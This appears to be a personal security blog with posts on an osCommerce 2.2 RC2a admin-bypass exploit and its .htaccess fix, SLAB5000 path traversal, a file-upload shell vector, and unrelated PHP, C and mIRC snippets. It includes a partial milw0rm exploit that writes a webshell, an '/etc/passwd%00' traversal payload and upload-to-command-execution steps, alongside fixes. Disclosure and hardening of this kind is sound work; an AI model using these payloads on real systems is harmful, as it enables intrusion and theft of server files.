Looking for Good Web Hosting


Sunday, April 04, 2010

osCommerce Online Merchant 2.2 RC2a RCE Exploit and Fix

osCommerce Online Merchant 2.2 RC2a RCE Exploit


Fix
If you are using osCommerce 2.2 RC2a, which comes by default in many webhosting packages, one way to protect a default installation from being hacked is to add these lines to the .htaccess file of the admin directory (the directory the exploit below posts to):



AuthName "Restricted Area" 
AuthType Basic 
AuthUserFile /home/yourusername/oscommerce-folder/admin/.htpasswd 
AuthGroupFile /dev/null 
require valid-user



and create the .htpasswd file (at the path given in AuthUserFile) with a line for your admin username, like this:


admin:$apr1$gVSQE/..$/Gn7sCLhfb7xsz1Zo1xlv1
(Note: the hash above is for the password 1234, do not use it as your password; generate your own line with htpasswd -c /path/to/.htpasswd admin. Apache refuses to serve .ht* files by default, but a strong password still matters: anyone who gets hold of the hash can crack it offline, and Basic auth sends the password in the clear unless the admin pages are served over HTTPS.)

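As an added example (not code from the original post or from osCommerce), the following Python script builds and checks .htpasswd lines in the $apr1$ MD5 format that Apache's htpasswd -m writes, and runs a small offline wordlist check over a constructed sample file. The admin line in the sample is the one shown above; the other two entries, their salts and the wordlist are made up here.

```python
"""Generate and verify Apache htpasswd entries in the $apr1$ (MD5) format.

Added example for the .htpasswd step above; not code from the original post
or from osCommerce. The sample file below is constructed here, except the
admin line, which is the one shown in the post.
"""
import hashlib
import hmac
import secrets

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """Apache's base-64 variant: low 6 bits first, `count` characters."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_md5(password: str, salt: str) -> str:
    """APR1 MD5-crypt, the scheme behind `htpasswd -m` entries."""
    pw = password.encode()
    s = salt.encode()[:8]
    # Alternate digest of pw + salt + pw, mixed into the main context.
    alt = hashlib.md5(pw + s + pw).digest()
    ctx = hashlib.md5(pw + b"$apr1$" + s)
    remaining = len(pw)
    while remaining > 0:
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bit = len(pw)
    while bit:
        ctx.update(b"\0" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()
    # 1000 rounds of stretching, each round mixing pw/salt/previous digest.
    for i in range(1000):
        ctx = hashlib.md5()
        ctx.update(pw if i & 1 else final)
        if i % 3:
            ctx.update(s)
        if i % 7:
            ctx.update(pw)
        ctx.update(final if i & 1 else pw)
        final = ctx.digest()
    order = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    encoded = "".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in order
    )
    encoded += _to64(final[11], 2)
    return "$apr1$" + s.decode() + "$" + encoded


def new_entry(user: str, password: str) -> str:
    """One htpasswd line with a fresh random 8-character salt."""
    salt = "".join(secrets.choice(ITOA64) for _ in range(8))
    return f"{user}:{apr1_md5(password, salt)}"


def verify(entry_hash: str, password: str) -> bool:
    """Check a password against a $apr1$ hash with a constant-time compare."""
    parts = entry_hash.split("$")
    if len(parts) != 4 or parts[1] != "apr1":
        raise ValueError("not an $apr1$ hash")
    return hmac.compare_digest(apr1_md5(password, parts[2]), entry_hash)


def weak_users(htpasswd_text: str, wordlist) -> list:
    """Users whose password appears in the wordlist (an offline audit of the file)."""
    weak = []
    for line in htpasswd_text.splitlines():
        if not line.strip() or ":" not in line:
            continue
        user, entry_hash = line.split(":", 1)
        if any(verify(entry_hash, word) for word in wordlist):
            weak.append(user)
    return weak


# Constructed sample file: the admin line is the one from the post (said to be
# password 1234); the other two are generated here with fixed salts.
SAMPLE_HTPASSWD = "\n".join([
    "admin:$apr1$gVSQE/..$/Gn7sCLhfb7xsz1Zo1xlv1",
    "staff:" + apr1_md5("password", "abcdefgh"),
    "ops:" + apr1_md5("Kq7!vZ2pL9#mTw4e", "ZyXwVuTs"),
])
WORDLIST = ["123456", "password", "1234", "admin", "letmein"]

if __name__ == "__main__":
    print(new_entry("admin", "1234"))  # random salt, so a different line each run
    print("weak entries:", weak_users(SAMPLE_HTPASSWD, WORDLIST))
```

Running it prints a freshly salted line for admin and the users whose password was found in the wordlist; if the admin hash above really is for 1234, as the post says, admin is in that list, which is the point: Basic auth in front of admin/ is only as strong as the password behind it.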



Exploit
Code from milw0rm:



<?php
// Excerpt of the milw0rm exploit. $host, $path, $admin_path and $shellcode are set
// earlier in the original and are not part of this excerpt: the target host, the
// osCommerce path, the admin directory, and the POST body that makes file_manager.php
// write fly.php. Appending "/login.php" to the script path is what gets the request
// past the admin login check.
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
    echo '[~]No response from '.$host;
    die;
}
fputs($fd,$message);
fclose($fd);
echo ("[+]Go and see your webshell: $host/fly.php");
?>

# milw0rm.com [2009-08-31]


Tuesday, March 23, 2010

Joomlalib issue about path (Dirty Solution)

I'm not good at writing, so let's fix this.


Problem:
You have Joomla 1.5 and want to install Joomlalib together with the Gallery2 Bridge. When you try to install Joomlalib 1.3.2 you get this:


Warning: require_once(/components/com_joomlalib/classes/jlcoreapi.class) [function.require-once]: failed to open stream: No such file or directory in "yourpath"/administrator/components/com_joomlalib/install.joomlalib.php on line 11.


Just replace this line (line 11 of install.joomlalib.php):
require_once($mosConfig_absolute_path . '/components/com_joomlalib/classes/jlcoreapi.class');


with this:
require_once($yourjoomlapath . '/components/com_joomlalib/classes/jlcoreapi.class');


where $yourjoomlapath is the absolute path of your Joomla installation, for example: /home/user/joomla

The warning shows why this works: $mosConfig_absolute_path is a Joomla 1.0 global that is empty under Joomla 1.5, so the require path starts at the filesystem root. Hardcoding the absolute path is the dirty fix; the Joomla 1.5 constant JPATH_SITE holds the same value without hardcoding it.


Maybe later I could format this post :)

Tuesday, October 03, 2006

3n + 1 problem

#include <stdio.h>

/* 3n + 1 (Collatz) sequence: halve even numbers, map odd n to 3n + 1, stop at 1. */
int main(void)
{
    long long num;  /* 3n + 1 overflows int for large inputs, so use a wider type */
    printf("insert number:\n");
    if (scanf("%lld", &num) != 1 || num < 1) {
        fprintf(stderr, "expected a positive integer\n");  /* 0 and negatives never reach 1 */
        return 1;
    }
    printf("%lld ", num);
    while (num != 1) {
        if (num % 2 == 0)
            num = num / 2;
        else
            num = 3 * num + 1;
        printf("%lld ", num);
    }
    printf("\n");
    return 0;
}

Sunday, April 23, 2006

Path Disclosure and Arbitrary File Read Vulnerability in SLAB5000

[Description]
SLAB5000 is a complete, dynamic, modular web-system designed to your specifications, allowing you to quickly and conveniently update all your content, add new pages, upload images, sounds and video from any browser, via our front-end interface, from any location where you have web access.
-- taken from their website http://www.slab5000.com --

I discovered two bugs, one known as "path disclosure" and an arbitrary file read vulnerability, in the SLAB5000 Content Management System, that allow a malicious attacker to read sensitive information about the system.

[Path Disclosure]
The $page parameter is used to build a file path without any validation, so a traversal string makes the include fail and PHP prints the full path in its warning:

http://www.server.com/index.php?page=../../../var

Warning: main(/usr/www/users/username/slab500/common/../../../var/index.php): failed to open stream: No such file or directory in /usr/www/users/usernameb/slab500/folder/index.php on line 63

[File Read]

Because of the same missing input checks, appending a NULL byte to the path cuts off the "/index.php" that the script appends, so any file the web server can read is included:

http://www.server.com/index.php?page=../../../../../etc/passwd%00

[Solution]
Edit the source to validate the $page input: accept only a known list of page names (or, at minimum, only letters, digits, "_" and "-"), and reject anything containing "..", "/" or a NULL byte before it is used in the path.

Sorry if my English is bad :)

Justin_T
irc: #nt at Undernet
shoutz: warcold, KrOsS, HoOH, lsdx, jsz, and all the guyz from DO.
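As an added example, not SLAB5000's code, the following Python contrasts the path construction that the warning message reveals with a validated version of the same lookup. The base directory is taken from the warning above; the allowlist of page names and the simulation of how a C-level open() stops at a NUL byte are assumptions made here.

```python
"""Hardened resolution of a ?page= parameter, against the two SLAB5000 bugs above.

Added example, not SLAB5000's code. vulnerable_resolve() mirrors the path the
advisory's warning message shows; BASE_DIR is taken from that warning, while
the allowlist and the NUL-truncation simulation are assumptions made here.
"""
import posixpath
import re
from urllib.parse import unquote

BASE_DIR = "/usr/www/users/username/slab500"            # from the warning in the advisory
ALLOWED_PAGES = frozenset({"home", "news", "contact"})  # constructed allowlist
PAGE_RE = re.compile(r"[a-z0-9_-]{1,32}")


def vulnerable_resolve(raw_page: str) -> str:
    """What the advisory implies the CMS did: decode and concatenate, no checks."""
    page = unquote(raw_page)  # the web server turns %00 into a real NUL byte
    path = BASE_DIR + "/common/" + page + "/index.php"
    # Older PHP handed this string to C file APIs, which stop at the first NUL,
    # so everything after %00 (including the forced "/index.php") was dropped.
    return path.split("\x00", 1)[0]


def safe_resolve(raw_page: str) -> str:
    """Allowlist the page name, then confirm the final path stays under the page root."""
    page = unquote(raw_page)
    if "\x00" in page:
        raise ValueError("NUL byte in page name")
    if not PAGE_RE.fullmatch(page):
        raise ValueError("page name has characters outside [a-z0-9_-]")
    if page not in ALLOWED_PAGES:
        raise ValueError("unknown page")
    root = posixpath.join(BASE_DIR, "common")
    full = posixpath.normpath(posixpath.join(root, page, "index.php"))
    # Defence in depth: even with the allowlist, check the result did not escape root.
    if not full.startswith(root + "/"):
        raise ValueError("resolved path escaped the page directory")
    return full


def classify(raw_page: str) -> str:
    """'allowed' or 'rejected: <reason>' for a raw ?page= value."""
    try:
        safe_resolve(raw_page)
        return "allowed"
    except ValueError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    # The two payloads from the advisory plus one legitimate page name.
    for p in ("home", "../../../var", "../../../../../etc/passwd%00"):
        print(f"{p!r:36} vulnerable -> {vulnerable_resolve(p)}")
        print(f"{'':36} hardened   -> {classify(p)}")
```

The vulnerable path for "../../../var" reproduces the string in the warning above byte for byte, and the %00 payload ends in "/etc/passwd" with the forced suffix gone; the hardened resolver rejects both and only ever returns paths inside common/.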

A path disclosure and a possible file inclusion vulnerability in thepeak File Upload v1.3

Justin_T

#NT - Undernet

justint (at) orangemail.com (dot) do

hi,

There is a possible path disclosure, and a way to run commands on a server, using thepeak File Upload v1.3.

By searching for /fileupload/index.php, an attacker can upload a malicious jpg or gif and execute commands or perform a file inclusion,

but a PHP file can't simply be uploaded with a .jpg extension, because the content type is detected as text/plain; look at this:

name : cmd.jpg

type : text/plain <--- when you upload the file, the content type shows up like this

tmp_name : /tmp/phpF0AItw <-- a copy of the file on the server under a random temp name

error : 0

size : 26564

http://server.com/fileupload/store/cmd.jpg <--- this is where the original file is stored

There are two ways to get in:

forging the content-type when uploading the file, or constructing a malicious jpg image with some commands in it, in order to:

1: chmod the dir for file inclusion

2: run certain commands on the server, etc.

Path Disclosure

When you put something like

http://www.attacker.com/command.jpg into the file upload input, it reveals the path of the web files, like this:

File Upload Manager v1.3 © thepeak

name : http://www.attacker.com/cmd.gif

type : application/octet-stream

tmp_name : /tmp/phptd8aE0

error : 0

size : 0

Warning: copy(store/http://www.attacker.com/cmd.gif): failed to open stream: No such file or directory in /home/user/public_html//fileupload/index.php on line 471

ERROR: cannot upload, please chmod the dir to 777

Some servers (those that let PHP's file functions open remote URLs) accept the remote file and you get this:

name : http://www.attacker.com/cmd.gif

type : application/octet-stream

tmp_name : /tmp/phptd8aE0

error : 0

size : 1035

file uploaded!

Sorry for my English, it's not good :). If you want to organize this info I'd appreciate it, thanks :)

Tuesday, April 04, 2006

IRC Stuffs

; ––––––––––––––––––––––––––––––––––––––––
; Put your own scripts in here.
; ––––––––––––––––––––––––––––––––––––––––
on 1:input:*:{
  if -ban isin $1- {
    //mode $chan +bbbb $2-
    haltdef
  }
  if .test isin $1- { //say i have %hackick.count kicks on #hack }
}
on 1:JOIN:#hack:{ if $nick isreg #hack /notice $nick This is a hacking help channel, to see tools and all for hack type !hack }
on 1:TEXT:!hack:#hack:{
  if $nick isreg # {
    /ban #hack $address($nick, 1)
    inc %hackick.count
    kick #hack %hackick.count idiots served!
  }
}
on 1:TEXT:*ý*:#hack:/kick #hack $nick english please
; ––––––––––––––––––––––––––––––––––––––––
; End of file
; ––––––––––––––––––––––––––––––––––––––––

Friday, November 04, 2005

Start

I'm not a good writer but I will try :)

Justin_T